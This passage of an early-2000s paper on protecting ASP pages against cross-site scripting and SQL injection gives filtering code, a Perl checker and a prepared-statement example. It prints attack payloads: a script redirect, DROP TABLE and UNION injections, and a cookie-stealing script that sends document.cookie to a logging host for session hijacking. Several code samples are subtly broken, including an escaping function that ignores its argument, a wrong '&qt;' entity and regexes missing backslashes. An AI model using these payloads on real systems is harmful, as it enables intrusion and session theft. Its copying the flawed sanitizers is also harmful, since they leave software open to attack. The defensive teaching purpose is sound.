str=Welcome!’);location.href=’http://www.patrice.ch/’;// So always check if you really have replaced all characters that can be used to escape the current environment. In the example above this would at least include the single quote. You should also escape the backslash in JavaScript, as it might be possible to abuse it. 3
  • 4. 1.2 Protection: Approach II Only Allow a Limited Character Set The first approach works quite well if you want to disallow any HTML. But from a security point of view it’s far from ideal, because it only forbids the characters that are dangerous today. With the next great browser there might be some other way to inject a script into the page. So it’s recommended to allow only a minimal set of characters. For example only letters, numbers and newlines. This code works fine to disable any character not included in the constant allowed. It also allows newlines. ’ Replace all evil characters Function cHtml(ByVal s) Dim i Dim snew Const allowed="abcdefghijklmnopqrstuvwxyz" & _ "ABCDEFGHIJKLMNOPQRSTUVWXYZ" & _ "0123456789¨a¨o¨u¨A¨O¨U .,!:;" & vbCrLf snew="" For i = 1 To Len(s) If Instr(1, allowed, Mid(s, i, 1))>0 Then snew = snew & Mid(s, i, 1) End If Next cHtml = snew End Function I have implemented this approach with the function limitStr in appendix A. 1.3 Protection: Approach III Safely Allow Some Tags If you really want to allow the user to insert HTML tags, the most secure way for this is to first sanitize all data using approach I (see section 1.1) and then re-replace all allowed tags. For example: <% Function cHtml(str) s = str s = Replace(s, "&", "&amp;") s = Replace(s, ">", "&qt;") s = Replace(s, "<", "&lt;") s = Replace(s, """", "&quot;") cHtml = s End Function Function htmlIze(str) Dim s s = cHtml(str) ’ Allowed tags, b, i, u 4
  • 5. s = Replace(s, "&lt;b&gt;", "<b>", 1, -1, 1) s = Replace(s, "&lt;/b&gt;", "</b>", 1, -1, 1) s = Replace(s, "&lt;i&gt;", "<i>", 1, -1, 1) s = Replace(s, "&lt;/i&gt;", "</i>", 1, -1, 1) s = Replace(s, "&lt;u&gt;", "<u>", 1, -1, 1) s = Replace(s, "&lt;/u&gt;", "</u>", 1, -1, 1) htmlIze = s End Function str = htmlIze(Request("str")) %> <html> <head> <title>htmlIze</title> </head> <body> This was your text: <p><%=str%></p> </body> </html> 1.4 Common Pitfalls Case sensitivity If you replace strings, replace everything case insensitive. The Replace function has a parameter for this. The last argument defines, whether to compare the strings binary (0) or as text (1): s = Replace(s, "<script>", "", 1, -1, 1) Note: I don’t recommend to only replace some “hostile” tags, because this approach is very risky and prone to changes in the browsers. Additionally you will most probably miss a few tags or attributes. So if you really need to allow the user to insert some tags, see section 1.3. Newlines When you want to strip out single tags, make sure that you also replace them over newlines. Assume this script: s = Request("str") s = Replace(s, "<script>", "", 1, -1, 1) Response.Write str The intention is to remove every occurrence of the tag “script”, it’s even case insensitive. Now this can be circumvented with this query string: str=%3Cscript%0D%0A%3Ealert(’testing’)%3C%2Fscript%3E Or to make it more human readable: str=<script[newline]>alert(’testing’)</script> There is now a newline (%0D%0A) right before the closing bracket. As HTML ignores this newline, the script will execute. To fix this vulnerability, this code can be used: s = Request("str") ’ replace newline combinations 5
  • 6. s = Replace(s, "<" & vbCr, "<") s = Replace(s, "<" & vbLf, "<") s = Replace(s, vbLf & ">", ">") s = Replace(s, vbCr & ">", ">") s = Replace(s, "<script>", "", 1, -1, 1) Response.Write str Note: Again, I discourage replacing some tags because you will most prob- ably miss some. See section “Newlines” for a more thorough discussion. Check all data Make sure that you really check all supplied data. A common problem is, that the form data is cleansed before displaying on the page, but the database data isn’t. The best approach to prevent that kind of problems is to define for every table whether the data in it is sanitized or not. So the developers know when they have to HTML-ize the data: either when putting it into the table or when using it for HTML output. I recommend you to protect all data against SQL injection directly when getting the input from the client. If you follow this approach you can use the checker script to check your code for bugs. See section 4.3 for information. But when I use approach 1, I usually protect against XSS when displaying the content. One reason for this is, that this way I can use the same data for displaying on a HTML page and for sending in mails, etc. 2 SQL Injection Now to the more dangerous part: SQL injection. This is a technique which allows the attacker to execute malicious SQL statements. With the help of xp_cmdshell it’s even possible to execute system commands if the database is accessed as ’sa’. This bug exists whenever you use unvalidated data that has been submitted by the client to perform a database query. Let’s take this SQL-Statement, where the string “TERM” can be submitted by the visitor. SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ’%TERM%’ The client could craft the term to drop the table T News: SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ’%’; DROP TABLE T_News --’ Yes, this is possible. Just submit ’; DROP TABLE T_News -- as the search term. First the WHERE clause is closed with the single quote, and then we can start the next statement with the semicolon. The two dashes at the end start a comment, so the single quote which the developer has inserted after the user’s input doesn’t produce a syntax error. It’s also possible to select any other data and display it instead of the News which the developer wanted to display on this page. You can use the UNION statement for that. The only requirement is that both queries return the same number of columns and the same data type in each column. If necessary use CONVERT to achieve that. [1] shows a trick how you can find out how many rows are included in the query using the HAVING clause. One example for a UNION crack: 6
  • 7. SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ’%DOESNOTEXIST’ UNION SELECT UserId, UserName FROM T_User --%’ 2.1 Protection: Approach I Filter characters Luckily this attack is much easier to protect against than cross-site scripting. Make sure to remove or escape all single quotes in string parameters1 . Additionally enforce that any numeric input is really numeric using the IsNumeric function call. The ASP functions (see section 4.2) include some generic functions to prevent you from SQL injection attacks if you use them every time. The numeric and date functions check if the input data is valid and then explicitly convert them with CInt, CLng, CDate, etc. 2.2 Protection: Approach II ADODB Command There is another approach which is very safe but more work to implement[12]. You can use ADODB prepared statements to automatically sanitize the data. See appendix D for an example. Please note, that in the example I have checked the numeric parameters. This isn’t strictly required, but if you let it out you get some nasty error messages: “Application uses a value of the wrong type for the current operation.”. 3 Attack Demonstration This is the procedure how a cross-site scripting attack could take place. It demon- strates how to steal a cookie. For the session handling, IIS sets a cookie named “ASPSESSION...”. It’s quite impossible to guess the name and the value. But it’s possible to steal this cookie. When you get a SessionID you can pass it to the server and then you own that session. I’ll give you a step by step guide. 3.0.1 Set up/look for a page to log cookies You first have to get some possibility to log the stolen cookies. This may be an ASP page on your own server that logs the query string to a file. Another possibility would be use the query string needed to create an entry in some guestbook. Let’s assume the URL to create a guestbook entry is http://some.host/xtgbadd.asp?user=cookie&msg=MESSAGE 3.0.2 Create a JavaScript Next you need to create a script to inject. This should redirect to the URL re- searched above inserting the message. For example: <script> location.href=’http://some.host/xtqbadd.asp?user=cookie&msg=’ + 1The exact protection approach depends on the database server. For Microsoft SQL Server it suffices to double all single quotes. For other database systems you would have to put a backslash before every single quote or escape some other characters. Consult the manual of your database or ask your vendor for details. 7
  • 8. document.cookie </script> 3.0.3 Inject the script Now inject the created script into the targeted page. For example you could inject it into a session-based ASP forum or guestbook. 3.0.4 Break the session I assume you had at least one victim. Get the cookie from your log file (or wherever it is stored) and extract the ASPSESSIONID cookie. For example: ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK Then you connect to the Web server and use this command. (End with two newlines) GET /$TARGETSITE HTTP/1.1 Host: $WEBSERVER Connection: Close Cookie: ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK 4 Solutions 4.1 Some Ideas There are a number of ideas to fix this two security problems. The basic approach is to create a library of ASP functions which can be used without much hassle. The advantage of this is that it can be used very easily. But it’s not the best way, because you need to think of it every time you read some request. The one and only place where you forget to use this functions might be the door for an attacker. The other major disadvantage is that this requires a system for code sharing to ensure that every Web application uses current functions. Combined with the ASP functions it’s possible to create a checker tool that reads the source files on the server and tries to detect the parameters which aren’t checked. This could even be automated using command line options and/or a configuration file. Another idea that floated around in my head was to create an ISAPI filter, so that you don’t have to rewrite the applications. This would be a great advantage, but it has some disadvantaged. The most serious problem is the fact that in the ISAPI filter you can’t know whether to protect this query against SQL injection or cross-site scripting. As we have seen, both need different filtering. It might be possible to solve this using some configuration files. I have decided not to dig into this for the moment, because it would be quite time consuming. As I find the idea of the checker tool very sexy I decided to implement the ASP functions and a checker tool. 4.2 ASP Functions Appendix A shows the code for an include file that provides the necessary func- tions to protect against XSS and SQL injection. cHtml protects against cross-site scripting using the approach 1 (see section 1.1). The functions starting with the letter“n”(you guessed it,“n”stands for“new”) are equivalents for the corresponding VBScript function, e.g. CInt or CStr. 8
  • 9. 4.3 Checker Tool When using the ASP functions it’s crucial that they are used every time when you process request data. The one single request where you forget that can be the wide open door for an attacker. I created a prototype of such a checker tool. The idea is to get a list of the vulnerable files so that they can be fixed. It is written in Perl because Perl is great for rapid development and provides great string functions. It is also available for the Microsoft Windows platforms. 4.3.1 Algorithm 1. Find statement which reads request data 2. Does the data get sanitized using one of the ASP functions? 3. If no, mark the line as vulnerable 4. Continue until end of file The code is presented in appendix C. 4.4 Configuration Changes There are some configuration changes that can be done to restrict the attackers when exploiting SQL injection bugs. First you can tell IIS not to give detailed error messages when an error occurs. So it gets a lot harder, though by far not impossible. Additionally you should remove all extended stored procedures. With them it’s possible to harm the whole system. For example with xp cmdshell it’s possible to add users, delete files, put files on the server, ... A ASP Functions Code This is the code for the include file with the ASP functions discussed in section 4.2. <% ’------------------------------------------------------------------- ’ Functions to sanitize the client input. ’ ’ Protect against cross-site scripting and SQL injection ’ ’ HELP: What functions shall I use? ’ - If you have some data that you want to display on a HTML page, ’ use cHtml. It escapes any HTML input so it protects you ’ against cross-site scripting. ’ - If you’re using the data for database queries, use the n* ’ functions: ’ - nInt, nDbl, nLng ’ This functions check if the input data is numeric and ’ convert it. If the data is invalid, they return 0. ’ - nStr ’ Replaces the single quotes in strings. So SQL injection is ’ not possible. ’ ’ Copyright 2002, Patrice Neff, namics ag 9
  • 10. ’ Placed in the GPL license. ’------------------------------------------------------------------- Function cHtml(value) s = str s = Replace(s, "&", "&amp;") s = Replace(s, ">", "&qt;") s = Replace(s, "<", "&lt;") s = Replace(s, """", "&quot;") cHtml = s End Function Function nInt(value) If IsNumeric(value) Then nInt = CInt(value) Else nInt = 0 End If End Function Function nDbl(value) If IsNumeric(value) Then nDbl = CDbl(value) Else nDbl = 0.0 End If End Function Function nLng(value) If IsNumeric(value) Then nLng = CLng(value) Else nLng = 0 End If End Function Function nStr(value) Dim s: s = value s = Replace(s, "’", "’’") s = Replace(s, "‘", "’’") nStr = s End Function ’ Constants for limitStr Const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" Const alphnum = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" Function limitStr(value, limitset) Dim s: s = "" Dim i 10
  • 11. For i = 1 To Len(value) If InStr(1, limitset, Mid(value, i, 1))>0 Then s = s & Mid(value, i, 1) End If Next limitStr = s End Function ’ Currently does nothing. Provided for the checker tool and might be ’ required in the future Function mailVal(value) mailVal = value End Function ’ Required for cases where the string doesn’t have to be sanitized ’ e.g.: If Request.QueryString<>"" Then Function ignVal(value) ignVal = value End Function %> B Regular Expressions This are some examples for validation using Regular Expressions[8]. Regular ex- pressions are far more powerful than the simple replace functions in appendix A but also more complex to write. ’Generic function to validate strings using regular expressions Function fncStringValid(strInput, strPattern) Dim MyRegExp Set MyRegExp = New RegExp MyRegExp.Pattern = ">" & strPattern & ">" fncStringValid = MyRegExp.Test(">" & strInput & ">") End Function ’Phone validation Function fncPhoneValid(strInput) fncPhoneValid = fncStringValid(strInput, "0[0-9]{8,14}") End Function ’Mobile phone validation Function fncMobileValid(strInput) fncMobileValid = fncStringValid(strInput, "07[689][0-9]{7}") End Function ’email validation 11
  • 12. Function fncEmailValid(strInput) fncEmailValid = fncStringValid(strInput, "[w.-]+@[w.-]+(.(w)+)+") End Function C Checker Tool Code #!/usr/bin/perl -w # This script can be used to check if an ASP file is protected # against cross-site scripting and SQL injection. It only works # for VBScript files. # # Algorithm: # 1. Find a statement which gets data from the client # E.g.: - Request.Form(..) # - Request.QueryString(..) # - Request.Cookies(..) # - Request(..) # 2. Check if the requested data is sanitized with one of the ASP # functions: # - nStr, nInt, nDbl, nLng # - htmlConv, limitStr, mailVal, ignVal # 3. If not, print an error # 4. Continue at step 1 # # Copyright 2002, Patrice Neff, namics ag # Placed in the GPL license. use strict; my ($version, $date, $prog) = ("0.1", "June 05, 2002", "AspSecCheck"); # the functions which can read client data my @clrfuncs = qw(Request Request.Form Request.QueryString Request.Cookies); # the recognized ASP functions that can be used to sanitize data my @aspfuncs = qw(nStr nInt nDbl nLng htmlConv limitStr mailVal ignVal); ### process input my $depth=0; # current brackets depth my $sawfunc=-1; # level where we’ve last seen one of the aspfuncs my $line=0; # the current line number my $errors=0; # number of problems found my $incomment=0; # true if inside a comment while (<>) { $line++; while (/((w+([w.]+))|)|(|’)/g) { if ($1 eq "(") { $depth++ unless $incomment; } elsif ($1 eq ")") { $depth-- unless $incomment; 12
  • 13. $sawfunc=-1 if $sawfunc>$depth; } elsif ($1 eq "’") { $incomment=1; } else { $sawfunc=$depth if (not $incomment and grep(/^$1$/i, @aspfuncs)); if (grep(/^$1$/i, @clrfuncs) and $sawfunc<0 and not $incomment) { print " line: $line, word: $1n"; $errors++; } } } $incomment=0; } print "$errors unchecked variables found!n"; D Example for ADODB.Command <!--METADATA NAME="Microsoft ActiveX Data Objects 2.5 Library" TYPE="TypeLib" UUID="{00000205-0000-0010-8000-00AA006D2EA4}"--> <!--#include file="secur_funcs.asp"--> <html> <head> <title>login</title> </head> <body> <% strUsername = Request.Form("username") strPassword = Request.Form("password") intId = Request("id") If Request.ServerVariables("CONTENT_LENGTH")>0 Then strSQL = "SELECT Count(*) AS c FROM users WHERE " & _ "uname=? and pwd=? and id=?" strConn = "Provider=SQLOLEDB;Data Source=(local);" & _ "Initial Catalog=testweb;User Id=sa;Password=" Set cmd = Server.CreateObject("ADODB.Command") With cmd .CommandText = strSQL .CommandType = adCmdText .Parameters.Append .CreateParameter("", adVarChar, _ adParamInput, 50, strUsername) .Parameters.Append .CreateParameter("", adVarChar, _ adParamInput, 50, strPassword) .Parameters.Append .CreateParameter("", adInteger, _ adParamInput, , intId) .ActiveConnection = strConn Set rs = .Execute() End With If rs("c")=1 Then Response.Write "You’re logged in" Else Response.Write "Invalid login" 13
  • 14. End If Else %> <form action="sql_command.asp" method="post"> Name: <input type="text" name="username"><br> Pass: <input type="text" name="password"><br> Id: <input type="text" name="id"><br> <input type="submit"> </form> <% End If %> </body> </html> References [1] Chris Anley. Advanced SQL injection in SQL server applications. http:// www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002. 6 [2] Chris Anley. More advanced SQL injection in SQL server applications. http: //www.nextgenss.com/papers/more_advanced_sql_injection.pdf, 2002. [3] CERT. Advisory CA-2000-02 malicious HTML tags embedded in client Web requests. http://www.cert.org/advisories/CA-2000-02.html, February 2000. [4] CERT. Understanding malicious content mitigation for Web developers. http: //www.cert.org/tech_tips/malicious_code_mitigation.html/, February 2000. [5] Cgisecurity.com. The cross site scripting faq. http://www.cgisecurity.com/ articles/xss-faq.shtml, May 2002. [6] SPI Dynamics. Web applications and SQL injection. http://www. spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf. [7] eyeonsecurity Inc. Extended html form attack. http://eyeonsecurity.net/ papers/Extended%20HTML%20Form%20Attack.htm, January 2002. [8] Jeffrey E. F. Friedl. Mastering Regular Expressions. O’Reilly & Associates, Inc., 103a Morris Street, Sebastopol, CA 95472, USA, Tel: +1 707 829 0515, and 90 Sherman Street, Cambridge, MA 02140, USA, Tel: +1 617 354 5800, 1997. 11 [9] iDEFENSE. Evolution of cross-site scripting attacks. http://www.idefense. com/XSS.html, May 2002. [10] SecurityFocus. Bugtraq mailinglist. http://online.securityfocus.com/ archive/1. [11] sqlsecurity.com. SQL injection FAQ. http://www.sqlsecurity.com/ DesktopDefault.aspx?tabindex=2&tabid=3. [12] Christoph Wille. Gegengifte f¨ur SQL injection. http://www.aspheute.com/ artikel/20011031.htm, April 2001. 7 14